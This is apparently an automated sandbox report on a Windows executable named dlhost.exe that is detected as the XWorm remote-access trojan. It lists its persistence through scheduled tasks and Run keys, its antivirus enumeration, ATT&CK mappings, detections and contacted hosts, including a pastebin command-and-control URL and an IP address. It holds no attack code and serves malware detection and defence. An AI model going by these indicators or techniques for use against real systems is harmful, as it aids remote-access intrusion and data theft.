                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\dlhost.exeQueries volume information: C:\Users\user\dlhost.exe VolumeInformation
                    Source: C:\Users\user\dlhost.exeQueries volume information: C:\Users\user\dlhost.exe VolumeInformation
                    Source: C:\Users\user\dlhost.exeQueries volume information: C:\Users\user\dlhost.exe VolumeInformation
                    Source: C:\Users\user\Desktop\dlhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: dlhost.exe, 00000000.00000002.3311500140.000000001B434000.00000004.00000020.00020000.00000000.sdmp, dlhost.exe, 00000000.00000002.3275976582.0000000000780000.00000004.00000020.00020000.00000000.sdmp, dlhost.exe, 00000000.00000002.3311500140.000000001B475000.00000004.00000020.00020000.00000000.sdmp, dlhost.exe, 00000000.00000002.3275976582.000000000071C000.00000004.00000020.00020000.00000000.sdmp, dlhost.exe, 00000000.00000002.3311500140.000000001B50A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\dlhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\dlhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\dlhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\dlhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: dlhost.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.dlhost.exe.1a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dlhost.exe PID: 4952, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\dlhost.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: dlhost.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.dlhost.exe.1a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dlhost.exe PID: 4952, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\dlhost.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory23
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		Security Account Manager441
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets51
                    Virtualization/Sandbox Evasion                    		SSHKeylogging2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input Capture13
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578052 Sample: dlhost.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 40 pastebin.com 2->40 42 ip-api.com 2->42 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 58 13 other signatures 2->58 8 dlhost.exe 15 5 2->8         started        13 dlhost.exe 2->13         started        15 dlhost.exe 2->15         started        17 dlhost.exe 2->17         started        signatures3 56 Connects to a pastebin service (likely for C&C) 40->56 process4 dnsIp5 44 91.200.220.129, 49771, 49830, 49839 VICATVUA Ukraine 8->44 46 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 8->46 48 pastebin.com 104.20.4.235, 443, 49755 CLOUDFLARENETUS United States 8->48 36 C:\Users\user\dlhost.exe, PE32 8->36 dropped 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 66 Drops PE files to the user root directory 8->66 74 4 other signatures 8->74 19 powershell.exe 22 8->19         started        22 powershell.exe 22 8->22         started        24 powershell.exe 23 8->24         started        26 schtasks.exe 8->26         started        38 C:\Users\user\AppData\...\dlhost.exe.log, CSV 13->38 dropped 68 Antivirus detection for dropped file 13->68 70 Multi AV Scanner detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 file6 signatures7 process8 signatures9 60 Loading BitLocker PowerShell Module 19->60 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    dlhost.exe76%VirustotalBrowse
                    dlhost.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    dlhost.exe100%AviraHEUR/AGEN.1305769
                    dlhost.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\dlhost.exe100%AviraHEUR/AGEN.1305769
                    C:\Users\user\dlhost.exe100%Joe Sandbox ML
                    C:\Users\user\dlhost.exe76%ReversingLabsWin32.Exploit.Xworm
                    C:\Users\user\dlhost.exe76%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      pastebin.com
                      		104.20.4.235
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://pastebin.com/raw/ct3KF8KRfalse
                          		high
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2141017616.0000029D9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223868189.000001BBA9B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2118222449.0000029D80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99CD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://ion=v4.5powershell.exe, 00000008.00000002.2394864480.0000029CE5D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2118222449.0000029D80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99CD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000005.00000002.2239842410.000001BBB21AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2141017616.0000029D9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223868189.000001BBA9B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.microsoft.copowershell.exe, 00000002.00000002.2149754162.0000029DF2B8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2397434279.0000029CE5E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.micpowershell.exe, 00000005.00000002.2239842410.000001BBB2239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.2239842410.000001BBB2239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2118222449.0000029D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCD8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedlhost.exe, 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2118222449.0000029D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCD8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.95.112.1
                                                              		ip-api.comUnited States
                                                              		53334TUT-ASUSfalse
                                                              104.20.4.235
                                                              		pastebin.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              91.200.220.129
                                                              		unknownUkraine
                                                              		35365VICATVUAtrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1578052
                                                              Start date and time:2024-12-19 08:13:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 17s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:16
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:dlhost.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@16/15@2/3
                                                              EGA Information:
                                                              • Successful, ratio: 14.3%
                                                              HCA Information:
                                                              • Successful, ratio: 97%
                                                              • Number of executed functions: 88
                                                              • Number of non-executed functions: 5
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target dlhost.exe, PID 1476 because it is empty
                                                              • Execution Graph export aborted for target dlhost.exe, PID 2952 because it is empty
                                                              • Execution Graph export aborted for target dlhost.exe, PID 320 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 4396 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 4796 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              02:14:02API Interceptor45x Sleep call for process: powershell.exe modified
                                                              02:14:35API Interceptor1120226x Sleep call for process: dlhost.exe modified
                                                              08:14:35Task SchedulerRun new task: dlhost path: C:\Users\user\dlhost.exe
                                                              08:14:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dlhost C:\Users\user\dlhost.exe
                                                              08:14:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dlhost C:\Users\user\dlhost.exe

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              208.95.112.1WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                              • ip-api.com/json
                                                              xt.exeGet hashmaliciousXWormBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • ip-api.com/json
                                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • ip-api.com/json
                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                              • ip-api.com/json
                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                              • ip-api.com/json/
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • ip-api.com/json/
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • ip-api.com/json/
                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • ip-api.com/json/
                                                              Creal.exeGet hashmaliciousBlackshadesBrowse
                                                              • ip-api.com/json/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              pastebin.comhtkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              c2.exeGet hashmaliciousXmrigBrowse
                                                              • 104.20.4.235
                                                              Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                              • 104.20.4.235
                                                              file.exeGet hashmaliciousXWormBrowse
                                                              • 172.67.19.24
                                                              main.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                              • 104.20.4.235
                                                              http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                              • 172.67.19.24
                                                              http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                              • 172.67.19.24
                                                              KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                              • 104.20.3.235
                                                              ip-api.comWdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                              • 208.95.112.1
                                                              xt.exeGet hashmaliciousXWormBrowse
                                                              • 208.95.112.1
                                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • 208.95.112.1
                                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • 208.95.112.1
                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                              • 208.95.112.1
                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                              • 208.95.112.1
                                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.2
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1
                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              TUT-ASUSWdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                              • 208.95.112.1
                                                              xt.exeGet hashmaliciousXWormBrowse
                                                              • 208.95.112.1
                                                              roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • 208.95.112.1
                                                              roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                              • 208.95.112.1
                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                              • 208.95.112.1
                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                              • 208.95.112.1
                                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.2
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1
                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1
                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                              • 208.95.112.1
                                                              CLOUDFLARENETUSscript.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                              • 104.21.42.47
                                                              AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                              • 172.67.209.202
                                                              Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.21.86.72
                                                              469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.179.109
                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                              • 104.21.64.80
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                              • 104.21.67.146
                                                              1.elfGet hashmaliciousUnknownBrowse
                                                              • 141.101.96.239
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                              • 104.21.12.88
                                                              https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.26.92

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.20.4.235
                                                              TT copy.jsGet hashmaliciousFormBookBrowse
                                                              • 104.20.4.235
                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                              • 104.20.4.235
                                                              Rapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                              • 104.20.4.235
                                                              alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                              • 104.20.4.235
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                              • 104.20.4.235
                                                              Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.20.4.235

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dlhost.exe.log

                                                              Download File
                                                              Process:C:\Users\user\dlhost.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:true
